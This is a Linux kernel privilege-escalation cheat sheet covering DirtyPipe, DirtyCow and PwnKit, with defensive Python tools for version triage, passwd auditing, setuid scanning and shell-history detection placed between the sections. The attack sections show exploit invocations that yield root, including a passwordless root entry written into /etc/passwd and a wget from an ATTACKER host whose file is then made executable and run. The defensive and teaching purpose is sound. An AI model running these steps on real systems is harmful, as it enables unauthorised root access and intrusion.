KERNEL EXPLOITS

Check kernel version
Exact kernel version — Search for matching exploits
  uname -r
Example Output
  uname -r
  4.15.0-20-generic
  Search: 'linux kernel 4.15.0-20 exploit'
  Results: DirtyCow, various local privesc
  (Match exact version to exploits)

linux-exploit-suggester
Automated kernel exploit finder — Suggests matching CVEs
  ./linux-exploit-suggester.sh
  or: ./les.sh
Example Output
  ./linux-exploit-suggester.sh
  [+] CVE-2021-4034 (PwnKit)
      Versions: ALL
      Confidence: Highly probable
  [+] CVE-2022-0847 (DirtyPipe)
      Versions: 5.8 - 5.16.11
  [+] CVE-2016-5195 (DirtyCow)
      Versions: 2.6.22 - 4.8.3
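Matching `uname -r` against version ranges is also how a defender triages a fleet for patching. The script below is an added example (not part of this sheet or of linux-exploit-suggester): it parses `uname -r` strings and checks them against the two upstream ranges quoted above. The host inventory is constructed, and the range table only holds the CVEs listed on this page. Distribution kernels backport fixes without changing the upstream version number, so a hit means "check the distro changelog", not "confirmed vulnerable"; a miss on a distro kernel is likewise not proof of safety.

```python
import re

# Inclusive upstream kernel ranges as quoted in the suggester output above.
# This is an illustrative table for the CVEs on this page, not an advisory feed.
VULNERABLE_RANGES = {
    "CVE-2022-0847 (DirtyPipe)": ((5, 8, 0), (5, 16, 11)),
    "CVE-2016-5195 (DirtyCow)": ((2, 6, 22), (4, 8, 3)),
}


def parse_kernel_version(uname_r):
    """Turn a `uname -r` string such as '5.13.0-39-generic' into (major, minor, patch).

    Anything after the numeric prefix (distro build number, flavour) is ignored,
    which is exactly why backported fixes are invisible to this check.
    """
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", uname_r)
    if not m:
        raise ValueError("unrecognised kernel version: %r" % uname_r)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def matching_ranges(uname_r):
    """Names of page-listed CVEs whose upstream range contains this version."""
    version = parse_kernel_version(uname_r)
    return [name for name, (lo, hi) in VULNERABLE_RANGES.items() if lo <= version <= hi]


def triage(hosts):
    """hosts: {hostname: uname_r}. Returns {hostname: [cve, ...]} for hosts to review."""
    report = {}
    for host, uname_r in hosts.items():
        hits = matching_ranges(uname_r)
        if hits:
            report[host] = hits
    return report


if __name__ == "__main__":
    # Constructed inventory reusing the kernel versions quoted on this page.
    sample = {
        "web01": "5.13.0-39-generic",
        "db01": "4.4.0-21-generic",
        "build01": "4.15.0-20-generic",
        "new01": "5.16.12",
    }
    for host, hits in triage(sample).items():
        print("%s -> %s" % (host, ", ".join(hits)))
```

Feed it the output of `uname -r` collected from each host; hosts that land inside a range go to the patch queue for verification against the vendor's fixed-package list.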

DirtyPipe (CVE-2022-0847)
Overwrite read-only files — Very reliable
  Kernel 5.8 - 5.16.11
Example Output
  uname -r: 5.13.0-39-generic (VULNERABLE)
  ./dirtypipe /etc/passwd 1 '${root::0:0:root:/root:/bin/bash}'
  su root (no password)
  # whoami
  root

DirtyCow (CVE-2016-5195)
Race condition write to read-only — Older but still seen in labs
  Kernel 2.6.22 - 4.8.3
Example Output
  uname -r: 4.4.0-21-generic (VULNERABLE)
  gcc -pthread dirty.c -o dirty -lcrypt
  ./dirty newpassword
  su firefart
  Password: newpassword
  # whoami
  root (as firefart user with UID 0)
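Both of the exploits above leave the same kind of trace: a tampered /etc/passwd. The DirtyPipe example writes a root entry with an empty password field, and the DirtyCow example adds a second UID-0 user (firefart). The auditor below is an added example, not code from this sheet or from either exploit; the passwd sample it runs on is constructed and the finding texts are my own. It parses passwd(5) lines and reports extra UID-0 accounts, empty password fields, duplicate usernames and malformed lines, which is a cheap integrity check to run from a file-integrity monitor or incident-response playbook.

```python
# Constructed /etc/passwd sample (not from a real host): a normal root entry,
# two ordinary accounts, a second UID-0 account like the 'firefart' user the
# DirtyCow example leaves behind, and a duplicate root line with an empty
# password field like the one the DirtyPipe example writes.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
firefart:x:0:0:pwned:/root:/bin/bash
root::0:0:root:/root:/bin/bash
"""

FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; malformed lines get an 'error' key."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        entry = {"line": lineno}
        if len(fields) != len(FIELDS):
            entry["error"] = "expected 7 fields, got %d" % len(fields)
        else:
            entry.update(zip(FIELDS, fields))
            try:
                entry["uid"] = int(entry["uid"])
                entry["gid"] = int(entry["gid"])
            except ValueError:
                entry["error"] = "non-numeric uid/gid"
        entries.append(entry)
    return entries


def audit_passwd(text):
    """Return (line_number, finding) pairs for the conditions that
    /etc/passwd tampering during a privilege escalation typically produces."""
    findings = []
    first_seen = {}
    for e in parse_passwd(text):
        if "error" in e:
            findings.append((e["line"], "malformed line: " + e["error"]))
            continue
        # Only 'root' should own UID 0; any other name is a backdoor account.
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["line"], "extra UID 0 account: " + e["name"]))
        # An empty second field means no password is required ('x' defers to /etc/shadow).
        if e["passwd"] == "":
            findings.append((e["line"],
                             "empty password field for %s (login without password)" % e["name"]))
        # A duplicate name shadows or overrides the earlier entry depending on the lookup.
        if e["name"] in first_seen:
            findings.append((e["line"], "duplicate username %s (first seen on line %d)"
                             % (e["name"], first_seen[e["name"]])))
        else:
            first_seen[e["name"]] = e["line"]
    return findings


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for line, msg in audit_passwd(text):
        print("line %d: %s" % (line, msg))
```

Run it against /etc/passwd on a suspect host (or a copy pulled for forensics); the constructed sample above produces three findings, on lines 4 and 5.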

PwnKit (CVE-2021-4034)
Polkit local privesc — Almost always works if pkexec exists
  pkexec on most Linux distros
Example Output
  which pkexec && pkexec --version
  pkexec version 0.105
  ./PwnKit
  # whoami
  root
  (Works on almost all Linux distros with polkit installed)
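PwnKit only works because pkexec is installed setuid root, so the defender's check is a setuid inventory: is pkexec present, is it still setuid, and what else on the box carries the bit. The scanner below is an added example (not from this sheet or from polkit); the pkexec path is the usual /usr/bin/pkexec but is an assumption, and the demo tree it builds in a temp directory is constructed so the scan can be exercised without a real setuid binary. Where a patched polkit is not yet available, the widely published interim mitigation is to clear the setuid bit on pkexec; `pkexec_status` reports whether that has been done.

```python
import os
import stat
import tempfile


def mode_has_setuid(mode):
    """True if an st_mode value carries the setuid bit that PwnKit relies on."""
    return bool(mode & stat.S_ISUID)


def find_setuid_files(root):
    """Walk `root` without following symlinks and return the sorted paths of
    regular files with the setuid bit set. Entries that cannot be stat'ed are skipped."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and mode_has_setuid(st.st_mode):
                hits.append(path)
    return sorted(hits)


def pkexec_status(path="/usr/bin/pkexec"):
    """Classify the pkexec binary (path is an assumed default):
    'absent', 'setuid-root' (exposed unless polkit is patched), or
    'not-setuid' (interim mitigation of dropping the bit has been applied)."""
    try:
        st = os.stat(path)
    except OSError:
        return "absent"
    if mode_has_setuid(st.st_mode) and st.st_uid == 0:
        return "setuid-root"
    return "not-setuid"


def build_demo_tree():
    """Constructed demo: a temp directory holding one setuid file and one plain
    file, so the scanner can be exercised offline. Returns (root, setuid_path)."""
    root = tempfile.mkdtemp(prefix="setuid-demo-")
    bindir = os.path.join(root, "bin")
    os.makedirs(bindir)
    suid = os.path.join(bindir, "fake-pkexec")
    plain = os.path.join(bindir, "plain")
    for p in (suid, plain):
        open(p, "w").close()
    os.chmod(suid, 0o4755)
    os.chmod(plain, 0o755)
    return root, suid


if __name__ == "__main__":
    print("pkexec:", pkexec_status())
    root, suid = build_demo_tree()
    print("setuid files under demo tree:", find_setuid_files(root))
    # On a real host: find_setuid_files("/usr") lists everything to review.
```

Diff the scan output against a known-good baseline for the image; a new setuid file, or pkexec regaining the bit after a package upgrade, is worth an alert.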

Compile on target or cross-compile
Match architecture (x86/x64) — Static compile avoids library issues
  gcc exploit.c -o exploit
  or compile on attacker: gcc -static -m32 exploit.c -o exploit
Example Output
  On target:
    gcc exploit.c -o exploit
    ./exploit
  OR cross-compile on attacker:
    gcc -static -m64 exploit.c -o exploit
    python3 -m http.server 80
  On target:
    wget http://ATTACKER/exploit
    chmod +x exploit && ./exploit
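The two on-target sequences above, fetch-then-execute and compile-then-execute, are also a compact detection signature. The scanner below is an added example, not part of this sheet: it reads shell history lines (the sample is constructed, with the documentation address 203.0.113.5 standing in for ATTACKER) and flags a wget/curl download or a gcc/cc/clang build whose output file is made executable or run within the next few commands. History is easy for an intruder to clear, so the same logic belongs on auditd or EDR process telemetry; the matching rules are my own and are best-effort, not a parser for every shell syntax.

```python
import re

# Constructed ~/.bash_history sample modelled on the on-target sequence above.
SAMPLE_HISTORY = [
    "ls -la",
    "wget http://203.0.113.5/exploit",
    "chmod +x exploit && ./exploit",
    "cat /etc/os-release",
    "gcc exploit.c -o exploit",
    "./exploit",
    "curl -o tool http://203.0.113.5/t",
    "./tool",
]


def downloaded_name(cmd):
    """Best-effort name of the file a wget/curl command leaves on disk, else None."""
    if not re.match(r"\s*(?:wget|curl)\b", cmd):
        return None
    m = re.search(r"\s-[oO]\s*(\S+)", cmd)            # explicit output name
    if m:
        return m.group(1)
    m = re.search(r"https?://\S+/([^/\s?]+)", cmd)    # last URL path segment
    return m.group(1) if m else None


def compiled_name(cmd):
    """Output name of a gcc/cc/clang compile (-o), else None."""
    m = re.match(r"\s*(?:gcc|cc|clang)\b.*\s-o\s+(\S+)", cmd)
    return m.group(1) if m else None


def runs_or_marks_executable(cmd, name):
    """True if cmd runs ./name or does chmod +x on name (also inside && / ; chains)."""
    pattern = r"(?:^|[\s;&|])(?:\./|chmod\s+\+x\s+)" + re.escape(name) + r"(?:\s|$)"
    return re.search(pattern, cmd) is not None


def scan_history(lines, window=5):
    """Flag download-then-execute and compile-then-execute sequences.

    Returns (source_line, kind, name, exec_line) tuples, 1-based, where kind is
    'downloaded' or 'compiled' and exec_line is the first command within
    `window` later commands that runs or chmods the file.
    """
    findings = []
    for i, cmd in enumerate(lines):
        for kind, name in (("downloaded", downloaded_name(cmd)),
                           ("compiled", compiled_name(cmd))):
            if not name:
                continue
            for j in range(i + 1, min(i + 1 + window, len(lines))):
                if runs_or_marks_executable(lines[j], name):
                    findings.append((i + 1, kind, name, j + 1))
                    break
    return findings


if __name__ == "__main__":
    import sys
    lines = open(sys.argv[1]).read().splitlines() if len(sys.argv) > 1 else SAMPLE_HISTORY
    for src, kind, name, ex in scan_history(lines):
        print("line %d: %s '%s' executed on line %d" % (src, kind, name, ex))
```

Point it at a user's history file during triage; on the constructed sample it reports the wget/chmod pair, the gcc build that is run on the next line, and the curl download that is run immediately afterwards.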